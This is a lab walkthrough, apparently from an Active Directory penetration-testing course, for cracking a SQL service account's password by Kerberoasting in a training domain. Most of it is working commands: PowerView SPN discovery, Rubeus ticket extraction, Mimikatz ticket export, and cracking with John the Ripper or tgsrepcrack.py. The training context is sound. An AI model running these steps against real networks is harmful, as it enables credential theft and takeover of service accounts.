Obj 14 Kerberoast Pass Crack
Task - Using the Kerberoast attack, crack password of a SQL server service account.
We first need to find out services running with user accounts as the services running with machine accounts have difficult passwords. We can use PowerView’s (Get-DomainUser –SPN) or ActiveDirectory module for discovering such services:
Get Domain User SPN
PS C:\AD\Tools> Get-DomainUser -SPN
Output:
samaccountname : svcadmin
serviceprincipalname : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}This shows us that svcadmin has a SPN that we can kerberoast
Use Rubeus and John the Ripper to get the hash and crack it
C:\AD\Tools>C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple
/rc4opsec /outfile:C:\AD\Tools\hashes.txtWe can now use the file hashes.txt we just created with John the Ripper
We need to change this in the hashes.txt file first!
moneycorp.local:1433*
needs to be
moneycorp.local*
C:\AD\Tools>C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --
wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt- OPTION 2 -
KerberosRequestorSecurityToken.NET class from PowerShell, Mimikatz and tgsrepcrack.py
Use the KerberosRequestorSecurityToken.NET class from PowerShell to request a TGS
PS C:\AD\Tools> Add-Type -AssemblyNAme System.IdentityModel
PS C:\AD\Tools> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList
"MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"Check to see if we have the TGS for the service now
klistLet's dump the tickets to disk
PS C:\AD\Tools> . C:\AD\Tools\Invoke-Mimikatz.ps1
PS C:\AD\Tools> Invoke-Mimikatz -Command '"kerberos::list /export"'Now we have a kirbi file we crack with tgsrepcrack.py
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt
.\2-60a10000-studentx@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.localDOLLARCORP.MONEYCORP.LOCAL.kirbiLast updated